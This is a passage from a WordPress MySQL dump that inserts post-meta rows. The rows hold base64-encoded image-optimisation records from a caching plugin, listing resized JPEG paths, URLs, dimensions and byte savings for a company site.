uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVkFaTy0yLTEtMjUweDI1MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9WQVpPLTItMS0yNTB4MjUwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU5MTg3MCwiaWQiOjEzfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1ZBWk8tMi0xLTIwMHgyMDAuanBnIiwid2lkdGgiOjIwMCwiaGVpZ2h0IjoyMDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVkFaTy0yLTEtMjAweDIwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9WQVpPLTItMS0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU5MTg3MywiaWQiOjEzfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1ZBWk8tMi0xLTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVkFaTy0yLTEtMjI1eDIyNS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9WQVpPLTItMS0yMjV4MjI1LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU5MTg3NywiaWQiOjEzfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1ZBWk8tMi0xLTUxMHg2MDAuanBnIiwid2lkdGgiOjUxMCwiaGVpZ2h0Ijo2MDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVkFaTy0yLTEtNTEweDYwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9WQVpPLTItMS01MTB4NjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU5MTg4MCwiaWQiOjEzfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVkFaTy0yLTEtMTE0eDEzMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9WQVpPLTItMS0xMTR4MTMwLmpwZyIsIndpZHRoIjoiMTE0IiwiaGVpZ2h0IjoiMTMwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL1ZBWk8tMi0xLTExNHgxMzAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTkxODgzLCJpZCI6MTN9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9WQVpPLTItMS0xODB4MTgwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1ZBWk8tMi0xLTE4MHgxODAuanBnIiwid2lkdGgiOiIxODAiLCJoZWlnaHQiOiIxODAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvVkFaTy0yLTEtMTgweDE4MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1OTE4ODYsImlkIjoxM30seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1ZBWk8tMi0xLTI0N3gzMDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVkFaTy0yLTEtMjQ3eDMwMC5qcGciLCJ3aWR0aCI6IjI0NyIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9WQVpPLTItMS0yNDd4MzAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU5MTg5MCwiaWQiOjEzfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVkFaTy0yLTEtMzAweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9WQVpPLTItMS0zMDB4MzAwLmpwZyIsIndpZHRoIjoiMzAwIiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL1ZBWk8tMi0xLTMwMHgzMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTkxODkzLCJpZCI6MTN9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9WQVpPLTItMS00MDB4NDAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1ZBWk8tMi0xLTQwMHg0MDAuanBnIiwid2lkdGgiOiI0MDAiLCJoZWlnaHQiOiI0MDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvVkFaTy0yLTEtNDAweDQwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1OTE4OTcsImlkIjoxM30seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1ZBWk8tMi0xLTYwMHg2MDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVkFaTy0yLTEtNjAweDYwMC5qcGciLCJ3aWR0aCI6IjYwMCIsImhlaWdodCI6IjYwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9WQVpPLTItMS02MDB4NjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU5MTkwMCwiaWQiOjEzfV0='); 
INSERT INTO `wp_postmeta` VALUES (30455, 12, 'wpfc_optimisation_reduction', '3503'); 
INSERT INTO `wp_postmeta` VALUES (30456, 12, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvU3VwcG9ydC5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1N1cHBvcnQuanBnIiwid2lkdGgiOjQ1MCwiaGVpZ2h0IjozODcsIm1pbWVfdHlwZSI6IiIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9TdXBwb3J0LmpwZyIsInJlZHVjdGlvbiI6MzQ5NCwidGltZSI6MTQ4MzU5MTkwOCwiaWQiOiIxMiJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvU3VwcG9ydC0zNDB4MzQwLmpwZyIsIndpZHRoIjozNDAsImhlaWdodCI6MzQwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1N1cHBvcnQtMzQweDM0MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9TdXBwb3J0LTM0MHgzNDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTkxOTEwLCJpZCI6MTJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvU3VwcG9ydC0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1N1cHBvcnQtMjUweDI1MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9TdXBwb3J0LTI1MHgyNTAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTkxOTEyLCJpZCI6MTJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvU3VwcG9ydC0yMDB4MjAwLmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1N1cHBvcnQtMjAweDIwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9TdXBwb3J0LTIwMHgyMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTkxOTE0LCJpZCI6MTJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvU3VwcG9ydC0yMjV4MjI1LmpwZyIsIndpZHRoIjoyMjUsImhlaWdodCI6MjI1LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1N1cHBvcnQtMjI1eDIyNS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9TdXBwb3J0LTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTkxOTE2LCJpZCI6MTJ9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9TdXBwb3J0LTExNHgxMzAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvU3VwcG9ydC0xMTR4MTMwLmpwZyIsIndpZHRoIjoiMTE0IiwiaGVpZ2h0IjoiMTMwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL1N1cHBvcnQtMTE0eDEzMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1OTE5MTgsImlkIjoxMn0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1N1cHBvcnQtMTgweDE4MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9TdXBwb3J0LTE4MHgxODAuanBnIiwid2lkdGgiOiIxODAiLCJoZWlnaHQiOiIxODAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvU3VwcG9ydC0xODB4MTgwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU5MTkyMSwiaWQiOjEyfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvU3VwcG9ydC0yNDd4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1N1cHBvcnQtMjQ3eDMwMC5qcGciLCJ3aWR0aCI6IjI0NyIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9TdXBwb3J0LTI0N3gzMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTkxOTIzLCJpZCI6MTJ9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9TdXBwb3J0LTMwMHgzMDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvU3VwcG9ydC0zMDB4MzAwLmpwZyIsIndpZHRoIjoiMzAwIiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL1N1cHBvcnQtMzAweDMwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1OTE5MjUsImlkIjoxMn0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1N1cHBvcnQtNDAweDM4Ny5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9TdXBwb3J0LTQwMHgzODcuanBnIiwid2lkdGgiOiI0MDAiLCJoZWlnaHQiOiIzODciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvU3VwcG9ydC00MDB4Mzg3LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU5MTkyOCwiaWQiOjEyfV0='); 
INSERT INTO `wp_postmeta` VALUES (30457, 11, 'wpfc_optimisation_reduction', '137884'); 
INSERT INTO `wp_postmeta` VALUES (30458, 11, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvU3AuU29sdmVudHMuanBnIiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9TcC5Tb2x2ZW50cy5qcGciLCJ3aWR0aCI6MzUwMCwiaGVpZ2h0IjoyMzMzLCJtaW1lX3R5cGUiOiIiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvU3AuU29sdmVudHMuanBnIiwicmVkdWN0aW9uIjoxMzc4NzAsInRpbWUiOjE0ODM1OTE5MzgsImlkIjoiMTEifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1NwLlNvbHZlbnRzLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvU3AuU29sdmVudHMtMzQweDM0MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9TcC5Tb2x2ZW50cy0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU5MTk0MCwiaWQiOjExfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1NwLlNvbHZlbnRzLTgwMHg1MzMuanBnIiwid2lkdGgiOjgwMCwiaGVpZ2h0Ijo1MzMsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvU3AuU29sdmVudHMtODAweDUzMy5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9TcC5Tb2x2ZW50cy04MDB4NTMzLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU5MTk0MywiaWQiOjExfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1NwLlNvbHZlbnRzLTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvU3AuU29sdmVudHMtNzY4eDUxMi5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9TcC5Tb2x2ZW50cy03Njh4NTEyLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU5MTk0NiwiaWQiOjExfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1NwLlNvbHZlbnRzLTE2MDB4MTA2Ny5qcGciLCJ3aWR0aCI6MTYwMCwiaGVpZ2h0IjoxMDY3LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1NwLlNvbHZlbnRzLTE2MDB4MTA2Ny5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9TcC5Tb2x2ZW50cy0xNjAweDEwNjcuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTkxOTUwLCJpZCI6MTF9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvU3AuU29sdmVudHMtMjUweDI1MC5qcGciLCJ3aWR0aCI6MjUwLCJoZWlnaHQiOjI1MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9TcC5Tb2x2ZW50cy0yNTB4MjUwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL1NwLlNvbHZlbnRzLTI1MHgyNTAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTkxOTUzLCJpZCI6MTF9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvU3AuU29sdmVudHMtMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9TcC5Tb2x2ZW50cy0yMDB4MjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL1NwLlNvbHZlbnRzLTIwMHgyMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTkxOTU1LCJpZCI6MTF9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvU3AuU29sdmVudHMtMjI1eDIyNS5qcGciLCJ3aWR0aCI6MjI1LCJoZWlnaHQiOjIyNSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9TcC5Tb2x2ZW50cy0yMjV4MjI1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL1NwLlNvbHZlbnRzLTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTkxOTU3LCJpZCI6MTF9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvU3AuU29sdmVudHMtNTEweDYwMC5qcGciLCJ3aWR0aCI6NTEwLCJoZWlnaHQiOjYwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9TcC5Tb2x2ZW50cy01MTB4NjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYW